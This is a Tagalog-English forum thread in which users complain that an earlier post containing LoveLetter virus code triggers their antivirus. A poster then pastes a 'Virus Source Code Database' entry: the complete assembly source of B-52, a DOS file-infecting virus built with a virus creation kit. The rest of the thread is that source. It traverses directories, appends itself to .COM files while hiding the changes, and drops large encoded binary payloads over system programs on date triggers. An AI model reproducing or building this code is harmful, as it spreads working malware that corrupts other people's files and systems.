probably a variant of VBS/LoveLetter.BC virus

Connection terminated

mga bossing bakit pag click for sa first page may virus daw? :noidea:

http://www.symbianize.com/showthread.php?t=30055

probably a variant of VBS/LoveLetter.BC virus

Connection terminated

Same tayo, detected din ng AV namin yung 1st Page.

Naka-post yata dun ung code ng ILoveYou virus tapos nare-read ng ung code kaya nagtrigger yung AV..

@ Uchiha_Yueh: oo nga bro meron ata nag post ng code sa first page.. :weep:

to whom it may concern,
bro/sis paki edit naman nung post mo sa first page regarding LoveLetter.BC virus code.. :pray:

HEY bro, can I add your virus source codes??? wak mo ko sasamahin ha...

================================================
*** WARNING ***

The Virus Source Code Database (VSCDB) is for information purposes only, for researchers and computer virus or programming enthusiasts. No warranty is given or to be implied for any software listings contained herein. You take full responsibility for any damages caused by compiling, running, or sharing this information. Be aware that running any malicious code on another's computer or computer network might be a criminal act. Use at your own risk!

================================================
Virus Source Code Database :: b-exe451.txt

generic.boo - dump sector from infected 720K disk.
sector.001 - found at sectors 1 and 4
================================================== ===
SCANV99 - Found the Generic Boot [Genb] Virus in boot sector.
Found the BFD [BFD] Virus
Fprot 207 - Infection: BootEXE (451)
Solomon - This disk is identified as having BE boot.451 virus !!!


Virus Source Code Database :: b-52.asm
; B-52.ASM -- B-52
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by FrankenChrist

virus_type equ 0 ; Appending Virus

is_encrypted equ 0 ; We're not encrypted
; Yeah, it oughtta be
; considering all the
; ascii you can see in
; the final product,
; but SCAN 97 can detect
; it if you use encyption
; so if you know how to
; modify the encryption
; so it doesn't scan I'd
; love to know.

tsr_virus equ 0 ; We're not TSR

code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h

main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host

lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte

mov di,bp ; DI points to start of virus

mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack

mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h

call search_files ; Find and infect a file
call search_files ; Find and infect another file
call get_month
cmp ax,0004h ; Did the function return 4?
jg skip00 ; If greater, skip effect
call get_hour
cmp ax,0017h ; Did the function return 23?
jne skip00 ; If not equal, skip effect
jmp short strt00 ; Success -- skip jump
skip00: jmp end00 ; Skip the routine
strt00: lea dx,[di + data00] ; DX points to data
lea si,[di + data01] ; SI points to data
call drop_program
end00: call get_hour
cmp ax,000Eh ; Did the function return 14?
jg skip01 ; If greater, skip effect
call get_minute
cmp ax,0028h ; Did the function return 40?
jl skip01 ; If less, skip effect
jmp short strt01 ; Success -- skip jump
skip01: jmp end01 ; Skip the routine
strt01: lea dx,[di + data02] ; DX points to data
lea si,[di + data03] ; SI points to data
call drop_program
end01: call get_second
cmp ax,001Eh ; Did the function return 30?
jl skip02 ; If less, skip effect
call get_weekday
cmp ax,0003h ; Did the function return 3?
jne skip02 ; If not equal, skip effect
jmp short strt02 ; Success -- skip jump
skip02: jmp end02 ; Skip the routine
strt02: lea dx,[di + data04] ; DX points to data
lea si,[di + data05] ; SI points to data
call drop_program
end02:
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h

mov sp,bp ; Deallocate local buffer

xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;

ret ; Return to original program
main endp

search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack

mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h

mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h

call traverse ; Start the traversal

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h

mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller

root db "\",0 ; Root directory
search_files endp

traverse proc near
push bp ; Save BP

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address

mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack

mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h

mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present

check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h

call traverse ; Recursively call ourself

pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags

jnc done_searching ; If we infected then exit

another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file

leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h

pop bp ; Restore BP
ret ; Return to caller

up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp

find_files proc near
push bp ; Save BP

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address

mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack

push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h

mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file

done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h

pop bp ; Restore BP
ret ; Return to caller
find_files endp

infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA

mov byte ptr [di + set_carry],0 ; Assume we'll fail

cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit

size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle

mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h

mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h

xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX

sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump

mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle

mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h

mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h

mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
lea dx,[di + start] ; DX points to start of virus
int 021h

mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h

mov ah,03Eh ; DOS close file function
int 021h

mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller

set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp


May continuation po ito, hnd kac kakaxa....tgnan nyo nxt reply ko, popost ko

continuation

drop_program proc near
push di ; Save DI
mov ah,02Fh ; DOS get DTA function
int 021h
mov di,bx ; DI points to DTA
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
int 021h
jc create_file ; If not found then create it
write_in_file: mov ax,04301h ; DOS set file attributes function
xor cx,cx ; File will have no attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ax,03D01h ; DOS open file function, write
lea dx,[di + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; Transfer file handle to AX
mov ah,040h ; DOS write to file function
mov cx,[si] ; CX holds number of byte to write
lea dx,[si + 2] ; DX points to the data
int 021h
mov ax,05701h ; DOS set file date/time function
mov cx,[di + 016h] ; CX holds old file time
mov dx,[di + 018h] ; DX holds old file data
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attributes function
xor ch,ch ; Clear CH for attributes
mov cl,[di + 015h] ; CL holds old attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ah,04Fh ; DOS find next file function
int 021h
jnc write_in_file ; If successful do next file
jmp short dropper_end ; Otherwise exit
create_file: mov ah,03Ch ; DOS create file function
xor cx,cx ; File has no attributes
int 021h
xchg bx,ax ; Transfer file handle to AX
mov ah,040h ; DOS write to file function
mov cx,[si] ; CX holds number of byte to write
lea dx,[si + 2] ; DX points to the data
int 021h
mov ah,03Eh ; DOS close file function
int 021h
dropper_end: pop di ; Restore DI
ret ; Return to caller
drop_program endp


data00 db "c:\dos\*.com",0

get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp

get_minute proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,cl ; Copy minute into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_minute endp

get_month proc near
mov ah,02Ah ; DOS get date function
int 021h
mov al,dh ; Copy month into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_month endp

get_second proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,dh ; Copy second into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_second endp

get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp

data01 dw 269h
db 0E9h, 000h, 000h, 0BFh, 012h, 001h, 0B9h, 073h
db 001h, 02Eh, 081h, 005h, 000h, 000h, 047h, 047h
db 0E2h, 0F7h, 0E8h, 000h, 000h, 05Dh, 081h, 0EDh
db 015h, 001h, 081h, 0FCh, 04Ah, 054h, 074h, 00Bh
db 08Dh, 0B6h, 0F8h, 001h, 0BFh, 000h, 001h, 057h
db 0A4h, 0EBh, 011h, 01Eh, 006h, 00Eh, 01Fh, 00Eh
db 007h, 08Dh, 0B6h, 0F7h, 001h, 08Dh, 0BEh, 0EFh
db 001h, 0A5h, 0A5h, 0A5h, 0A5h, 0C6h, 086h, 097h
db 004h, 003h, 0B4h, 01Ah, 08Dh, 096h, 06Ch, 004h
db 0CDh, 021h, 0B4h, 047h, 0B2h, 000h, 08Dh, 0B6h
db 02Ch, 004h, 0CDh, 021h, 0C6h, 086h, 02Bh, 004h
db 05Ch, 0B8h, 024h, 035h, 0CDh, 021h, 089h, 09Eh
db 027h, 004h, 08Ch, 086h, 029h, 004h, 0B4h, 025h
db 08Dh, 096h, 0E7h, 003h, 0CDh, 021h, 00Eh, 007h
db 08Dh, 096h, 0EAh, 003h, 0E8h, 0E3h, 000h, 08Dh
db 096h, 0F0h, 003h, 0E8h, 0DCh, 000h, 0B4h, 03Bh
db 08Dh, 096h, 0F6h, 003h, 0CDh, 021h, 073h, 0E8h
db 0B4h, 02Ah, 0CDh, 021h, 080h, 0FAh, 00Fh, 072h
db 020h, 081h, 0F9h, 0C8h, 007h, 072h, 01Ah, 03Ch
db 000h, 075h, 016h, 0B4h, 02Ch, 0CDh, 021h, 080h
db 0FDh, 013h, 075h, 00Dh, 080h, 0F9h, 0FFh, 074h
db 056h, 080h, 0FEh, 0FFh, 075h, 003h, 080h, 0FAh
db 03Ch, 0B8h, 024h, 025h, 0C5h, 096h, 027h, 004h
db 0CDh, 021h, 00Eh, 01Fh, 0B4h, 03Bh, 08Dh, 096h
db 02Bh, 004h, 0CDh, 021h, 0B4h, 01Ah, 0BAh, 080h
db 000h, 081h, 0FCh, 046h, 054h, 074h, 003h, 0CDh
db 021h, 0C3h, 007h, 01Fh, 0CDh, 021h, 08Ch, 0C0h
db 005h, 010h, 000h, 02Eh, 001h, 086h, 0F1h, 001h
db 02Eh, 003h, 086h, 0F5h, 001h, 0FAh, 02Eh, 08Bh
db 0A6h, 0F3h, 001h, 08Eh, 0D0h, 0FBh, 0EAh, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0CDh, 020h, 000h, 000h, 000h, 000h, 000h, 0BEh
db 03Ah, 002h, 033h, 0D2h, 0E8h, 022h, 000h, 0BEh
db 03Ah, 002h, 0BAh, 001h, 000h, 0E8h, 019h, 000h
db 0BEh, 03Ah, 002h, 0BAh, 002h, 000h, 0E8h, 010h
db 000h, 0BEh, 03Ah, 002h, 0BAh, 003h, 000h, 0E8h
db 007h, 000h, 0B8h, 000h, 04Ch, 0CDh, 021h, 0EBh
db 088h, 0B8h, 043h, 000h, 0CDh, 014h, 0B4h, 001h
db 0ACh, 00Ah, 0C0h, 074h, 004h, 0CDh, 014h, 0EBh
db 0F5h, 0C3h, 041h, 054h, 026h, 046h, 04Ch, 030h
db 04Dh, 030h, 044h, 054h, 039h, 031h, 031h, 00Dh
db 00Ah, 000h, 05Bh, 04Dh, 050h, 043h, 05Dh, 000h
db 043h, 061h, 06Ch, 06Ch, 020h, 039h, 031h, 031h
db 020h, 000h, 0B4h, 04Eh, 0B9h, 007h, 000h, 0CDh
db 021h, 072h, 04Eh, 0B0h, 000h, 0E8h, 05Ch, 001h
db 0B4h, 03Fh, 08Dh, 096h, 098h, 004h, 0B9h, 01Ah
db 000h, 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h, 081h
db 0BEh, 098h, 004h, 04Dh, 05Ah, 074h, 026h, 08Bh
db 086h, 08Fh, 004h, 03Dh, 04Eh, 044h, 074h, 025h
db 08Bh, 086h, 086h, 004h, 03Dh, 0F4h, 001h, 072h
db 01Ch, 03Dh, 050h, 0FCh, 077h, 017h, 08Bh, 09Eh
db 099h, 004h, 081h, 0C3h, 0F9h, 002h, 03Bh, 0C3h
db 074h, 00Bh, 0EBh, 07Ch, 090h, 081h, 0BEh, 0A8h
db 004h, 04Ah, 054h, 075h, 005h, 0B4h, 04Fh, 0EBh
db 0AEh, 0C3h, 0C4h, 086h, 0ACh, 004h, 089h, 086h
db 0F7h, 001h, 08Ch, 086h, 0F9h, 001h, 0C4h, 086h
db 0A6h, 004h, 08Ch, 086h, 0FBh, 001h, 089h, 086h
db 0FDh, 001h, 08Bh, 086h, 0A0h, 004h, 0B1h, 004h
db 0D3h, 0E0h, 093h, 0C4h, 086h, 086h, 004h, 08Ch
db 0C2h, 050h, 052h, 02Bh, 0C3h, 083h, 0DAh, 000h
db 0B9h, 010h, 000h, 0F7h, 0F1h, 089h, 096h, 0ACh
db 004h, 089h, 086h, 0AEh, 004h, 089h, 086h, 0A6h
db 004h, 0C7h, 086h, 0A8h, 004h, 04Ah, 054h, 05Ah
db 058h, 005h, 0F6h, 002h, 083h, 0D2h, 000h, 0B1h
db 009h, 050h, 0D3h, 0E8h, 0D3h, 0CAh, 0F9h, 013h
db 0D0h, 058h, 080h, 0E4h, 001h, 089h, 096h, 09Ch
db 004h, 089h, 086h, 09Ah, 004h, 00Eh, 007h, 0FFh
db 0B6h, 0ACh, 004h, 0B9h, 01Ah, 000h, 0EBh, 01Ah
db 0B9h, 003h, 000h, 02Bh, 0C1h, 08Dh, 0B6h, 098h
db 004h, 08Dh, 0BEh, 0F8h, 001h, 0A5h, 0A4h, 0C6h
db 044h, 0FDh, 0E9h, 089h, 044h, 0FEh, 005h, 003h
db 001h, 050h, 051h, 033h, 0C9h, 0E8h, 08Eh, 000h
db 0B0h, 002h, 0E8h, 07Fh, 000h, 0B4h, 040h, 08Dh
db 096h, 098h, 004h, 059h, 0CDh, 021h, 0B8h, 002h
db 042h, 033h, 0C9h, 099h, 0CDh, 021h, 0B4h, 02Ch
db 0CDh, 021h, 089h, 096h, 00Ch, 001h, 08Dh, 0BEh
db 0F9h, 003h, 0B8h, 055h, 053h, 0ABh, 08Dh, 0B6h
db 003h, 001h, 0B9h, 00Fh, 000h, 056h, 051h, 0F3h
db 0A4h, 080h, 0B6h, 00Bh, 001h, 028h, 08Dh, 0B6h
db 0D8h, 003h, 0B9h, 00Fh, 000h, 0F3h, 0A4h, 059h
db 05Eh, 05Ah, 057h, 056h, 051h, 0F3h, 0A4h, 0B8h
db 05Dh, 05Bh, 0ABh, 0B0h, 0C3h, 0AAh, 083h, 0C2h
db 00Fh, 089h, 096h, 004h, 001h, 0E8h, 061h, 000h
db 059h, 05Fh, 05Eh, 0F3h, 0A4h, 0B8h, 001h, 057h
db 08Bh, 08Eh, 082h, 004h, 08Bh, 096h, 084h, 004h
db 0CDh, 021h, 0B4h, 03Eh, 0CDh, 021h, 0B5h, 000h
db 08Ah, 08Eh, 081h, 004h, 0E8h, 017h, 000h, 0FEh
db 08Eh, 097h, 004h, 075h, 004h, 058h, 0E9h, 0C7h
db 0FDh, 0E9h, 0E9h, 0FEh, 0B4h, 03Dh, 08Dh, 096h
db 08Ah, 004h, 0CDh, 021h, 093h, 0C3h, 0B8h, 001h
db 043h, 08Dh, 096h, 08Ah, 004h, 0CDh, 021h, 0C3h
db 05Bh, 05Dh, 0B4h, 040h, 08Dh, 096h, 003h, 001h
db 0B9h, 0F6h, 002h, 0CDh, 021h, 053h, 055h, 0B0h
db 003h, 0CFh, 02Ah, 02Eh, 065h, 078h, 065h, 000h
db 02Ah, 02Eh, 063h, 06Fh, 06Dh, 000h, 02Eh, 02Eh
db 000h

data02 db "*.exe",0


data03 dw 64Ah
db 0EBh, 007h, 069h, 090h, 090h, 090h, 0CDh, 020h
db 090h, 0E8h, 000h, 000h, 05Dh, 081h, 0EDh, 00Ch
db 001h, 050h, 0E8h, 002h, 000h, 0EBh, 021h, 03Eh
db 08Ah, 086h, 046h, 007h, 08Dh, 0B6h, 035h, 001h
db 0B9h, 00Fh, 006h, 030h, 004h, 0D2h, 0C0h, 046h
db 0E2h, 0F9h, 0C3h, 0E8h, 0E9h, 0FFh, 059h, 0CDh
db 021h, 0E8h, 0E3h, 0FFh, 0C3h, 051h, 0EBh, 0F3h
db 058h, 033h, 0FFh, 0FAh, 08Eh, 0D7h, 0BCh, 0F0h
db 002h, 0FBh, 0BEh, 096h, 000h, 036h, 08Bh, 01Ch
db 036h, 08Bh, 04Ch, 002h, 08Dh, 096h, 037h, 007h
db 036h, 089h, 014h, 036h, 08Ch, 04Ch, 002h, 026h
db 08Bh, 0B5h, 0F8h, 002h, 081h, 0FEh, 043h, 046h
db 075h, 002h, 0EBh, 035h, 02Eh, 089h, 05Dh, 04Ch
db 02Eh, 089h, 04Dh, 04Eh, 00Eh, 007h, 03Eh, 0C6h
db 086h, 074h, 007h, 000h, 03Eh, 0C6h, 086h, 043h
db 007h, 003h, 08Dh, 0B6h, 005h, 001h, 0BFh, 000h
db 001h, 0FCh, 0A5h, 0A5h, 0B4h, 01Ah, 08Dh, 096h
db 047h, 007h, 0CDh, 021h, 0B4h, 04Eh, 08Dh, 096h
db 03Ah, 007h, 08Dh, 0B6h, 065h, 007h, 052h, 0EBh
db 044h, 0B4h, 01Ah, 0BAh, 080h, 000h, 0CDh, 021h
db 033h, 0FFh, 08Eh, 0C7h, 0BEh, 096h, 000h, 02Eh
db 08Bh, 05Dh, 04Ch, 026h, 089h, 01Ch, 02Eh, 08Bh
db 04Dh, 04Eh, 026h, 089h, 04Ch, 002h, 00Eh, 007h
db 03Eh, 08Bh, 086h, 072h, 007h, 033h, 0DBh, 08Bh
db 0CBh, 08Bh, 0D1h, 08Bh, 0F2h, 08Bh, 0FEh, 0BCh
db 0FEh, 0FFh, 0BDh, 000h, 001h, 055h, 08Bh, 0E8h
db 0C3h, 00Bh, 0DBh, 074h, 006h, 0B4h, 03Eh, 0CDh
db 021h, 033h, 0DBh, 0B4h, 04Fh, 05Ah, 052h, 033h
db 0C9h, 033h, 0DBh, 0CDh, 021h, 073h, 003h, 0E9h
db 0A4h, 000h, 0B8h, 002h, 03Dh, 08Bh, 0D6h, 0CDh
db 021h, 072h, 0DEh, 08Bh, 0D8h, 0B4h, 03Fh, 0B9h
db 004h, 000h, 08Dh, 096h, 005h, 001h, 0CDh, 021h
db 03Eh, 080h, 0BEh, 008h, 001h, 069h, 074h, 0C9h
db 03Eh, 080h, 0BEh, 005h, 001h, 04Dh, 074h, 0C1h
db 0B8h, 002h, 042h, 033h, 0C9h, 033h, 0D2h, 0CDh
db 021h, 080h, 0FCh, 0F8h, 077h, 0B3h, 03Eh, 089h
db 086h, 075h, 007h, 0B4h, 040h, 0B9h, 004h, 000h
db 08Dh, 096h, 005h, 001h, 0CDh, 021h, 03Eh, 08Ah
db 0A6h, 046h, 007h, 0FEh, 0C4h, 080h, 0D4h, 000h
db 03Eh, 088h, 0A6h, 046h, 007h, 0B4h, 040h, 0B9h
db 03Eh, 006h, 08Dh, 096h, 009h, 001h, 0E8h, 0ECh
db 0FEh, 0B8h, 000h, 042h, 033h, 0C9h, 033h, 0D2h
db 0CDh, 021h, 03Eh, 08Bh, 086h, 075h, 007h, 040h
db 03Eh, 089h, 086h, 006h, 001h, 03Eh, 0C6h, 086h
db 005h, 001h, 0E9h, 03Eh, 0C6h, 086h, 008h, 001h
db 069h, 0B4h, 040h, 0B9h, 004h, 000h, 08Dh, 096h
db 005h, 001h, 0CDh, 021h, 03Eh, 0FEh, 086h, 074h
db 007h, 03Eh, 0FEh, 08Eh, 043h, 007h, 074h, 02Eh
db 03Eh, 0FEh, 086h, 046h, 007h, 03Eh, 080h, 096h
db 046h, 007h, 000h, 0E9h, 043h, 0FFh, 03Eh, 080h
db 0BEh, 074h, 007h, 003h, 073h, 018h, 0BFh, 000h
db 001h, 081h, 03Dh, 0CDh, 020h, 074h, 00Fh, 08Dh
db 096h, 040h, 007h, 0B4h, 03Bh, 0CDh, 021h, 072h
db 005h, 0B4h, 04Eh, 0E9h, 02Fh, 0FFh, 033h, 0FFh
db 08Eh, 0C7h, 0B4h, 02Ah, 0CDh, 021h, 080h, 0FAh
db 004h, 075h, 009h, 080h, 0FEh, 007h, 075h, 004h
db 033h, 0C0h, 0EBh, 01Eh, 0B4h, 02Ch, 0CDh, 021h
db 00Ah, 0C9h, 075h, 023h, 080h, 0FDh, 006h, 07Dh
db 01Eh, 002h, 0CDh, 08Bh, 0C1h, 098h, 002h, 0C6h
db 012h, 0C2h, 080h, 0D4h, 000h, 00Bh, 0C0h, 075h
db 001h, 040h, 08Bh, 0D0h, 0B9h, 001h, 000h, 033h
db 0DBh, 0B4h, 019h, 0CDh, 021h, 0CDh, 026h, 0BBh
db 0DCh, 003h, 0B4h, 02Ch, 0CDh, 021h, 0FEh, 0C6h
db 03Ah, 036h, 004h, 004h, 07Ch, 006h, 02Ah, 036h
db 004h, 004h, 0EBh, 0F4h, 08Ah, 0C6h, 08Ah, 0C8h
db 098h, 0D1h, 0E0h, 003h, 0D8h, 08Bh, 037h, 08Ah
db 06Ch, 0FFh, 08Bh, 0D6h, 0B4h, 009h, 0CDh, 021h
db 080h, 0FDh, 000h, 074h, 029h, 080h, 0FDh, 001h
db 074h, 0FEh, 080h, 0FDh, 002h, 074h, 021h, 080h
db 0FDh, 003h, 074h, 014h, 080h, 0FDh, 004h, 074h
db 057h, 080h, 0FDh, 005h, 074h, 06Dh, 080h, 0FDh
db 006h, 074h, 060h, 080h, 0FDh, 007h, 074h, 003h
db 0E9h, 056h, 0FEh, 0E8h, 0FDh, 0FFh, 0CDh, 020h
db 08Dh, 096h, 0A9h, 003h, 0B4h, 009h, 0CDh, 021h
db 0B4h, 001h, 0CDh, 021h, 08Dh, 096h, 0D9h, 003h
db 0B4h, 009h, 0CDh, 021h, 03Ch, 061h, 072h, 002h
db 02Ch, 020h, 03Ch, 041h, 074h, 0E0h, 03Ch, 052h
db 075h, 00Ch, 08Dh, 096h, 0D9h, 003h, 0B4h, 009h
db 0CDh, 021h, 08Ah, 0F1h, 0EBh, 08Eh, 03Ch, 049h
db 074h, 0C6h, 03Ch, 046h, 075h, 0CAh, 08Dh, 096h
db 0C7h, 003h, 0B4h, 009h, 0CDh, 021h, 0CDh, 020h
db 0B4h, 001h, 0CDh, 021h, 033h, 0C0h, 0B9h, 001h
db 000h, 08Bh, 0D0h, 08Dh, 09Eh, 077h, 007h, 0CDh
db 025h, 0EBh, 0A5h, 08Dh, 096h, 03Ah, 004h, 0B4h
db 009h, 0CDh, 021h, 0B4h, 001h, 0CDh, 021h, 0EBh
db 097h, 00Dh, 00Ah, 041h, 062h, 06Fh, 072h, 074h
db 02Ch, 020h, 052h, 065h, 074h, 072h, 079h, 02Ch
db 020h, 049h, 067h, 06Eh, 06Fh, 072h, 065h, 02Ch
db 020h, 046h, 061h, 069h, 06Ch, 03Fh, 024h, 00Dh
db 00Ah, 00Dh, 00Ah, 046h, 061h, 069h, 06Ch, 020h
db 06Fh, 06Eh, 020h, 049h, 04Eh, 054h, 020h, 032h
db 034h, 00Dh, 00Ah, 024h, 059h, 004h, 07Eh, 004h
db 0A2h, 004h, 0C8h, 004h, 006h, 004h, 0FFh, 004h
db 018h, 005h, 041h, 005h, 04Dh, 005h, 07Fh, 005h
db 0EEh, 005h, 0F7h, 005h, 014h, 006h, 027h, 006h
db 047h, 006h, 05Bh, 006h, 080h, 006h, 0ABh, 006h
db 0CCh, 006h, 0F4h, 006h, 014h, 004h, 049h, 027h
db 06Dh, 020h, 068h, 075h, 06Eh, 067h, 072h, 079h
db 021h, 020h, 020h, 049h, 06Eh, 073h, 065h, 072h
db 074h, 020h, 050h, 049h, 05Ah, 05Ah, 041h, 020h
db 026h, 020h, 042h, 045h, 045h, 052h, 020h, 069h
db 06Eh, 074h, 06Fh, 020h, 064h, 072h, 069h, 076h
db 065h, 020h, 041h, 03Ah, 020h, 061h, 06Eh, 064h
db 00Dh, 00Ah, 053h, 074h, 072h, 069h, 06Bh, 065h
db 020h, 061h, 06Eh, 079h, 020h, 06Bh, 065h, 079h
db 020h, 077h, 068h, 065h, 06Eh, 020h, 072h, 065h
db 061h, 064h, 079h, 02Eh, 02Eh, 02Eh, 020h, 024h
db 002h, 049h, 06Dh, 070h, 06Fh, 074h, 065h, 06Eh
db 063h, 065h, 020h, 065h, 072h, 072h, 06Fh, 072h
db 020h, 072h, 065h, 061h, 064h, 069h, 06Eh, 067h
db 020h, 075h, 073h, 065h, 072h, 027h, 073h, 020h
db 064h, 069h, 063h, 06Bh, 024h, 000h, 050h, 072h
db 06Fh, 067h, 072h, 061h, 06Dh, 020h, 074h, 06Fh
db 06Fh, 020h, 062h, 069h, 067h, 020h, 074h, 06Fh
db 020h, 066h, 069h, 074h, 020h, 069h, 06Eh, 020h
db 06Dh, 065h, 06Dh, 06Fh, 072h, 079h, 00Dh, 00Ah
db 024h, 001h, 043h, 061h, 06Eh, 06Eh, 06Fh, 074h
db 020h, 06Ch, 06Fh, 061h, 064h, 020h, 043h, 04Fh
db 04Dh, 04Dh, 041h, 04Eh, 044h, 02Ch, 020h, 073h
db 079h, 073h, 074h, 065h, 06Dh, 020h, 068h, 061h
db 06Ch, 074h, 065h, 064h, 00Dh, 00Ah, 024h, 000h
db 049h, 027h, 06Dh, 020h, 073h, 06Fh, 072h, 072h
db 079h, 02Ch, 020h, 044h, 061h, 076h, 065h, 02Eh
db 02Eh, 02Eh, 02Eh, 020h, 062h, 075h, 074h, 020h
db 049h, 027h, 06Dh, 020h, 061h, 066h, 072h, 061h
db 069h, 064h, 020h, 049h, 020h, 063h, 061h, 06Eh
db 027h, 074h, 020h, 064h, 06Fh, 020h, 074h, 068h
db 061h, 074h, 021h, 00Dh, 00Ah, 024h, 005h, 046h
db 06Fh, 072h, 06Dh, 061h, 074h, 020h, 061h, 06Eh
db 06Fh, 074h, 068h, 065h, 072h, 03Fh, 020h, 028h
db 059h, 02Fh, 04Eh, 029h, 03Fh, 020h, 024h, 007h
db 044h, 061h, 06Dh, 06Eh, 020h, 069h, 074h, 021h
db 020h, 020h, 049h, 020h, 074h, 06Fh, 06Ch, 064h
db 020h, 079h, 06Fh, 075h, 020h, 06Eh, 06Fh, 074h
db 020h, 074h, 06Fh, 020h, 074h, 06Fh, 075h, 063h
db 068h, 020h, 074h, 068h, 061h, 074h, 021h, 024h
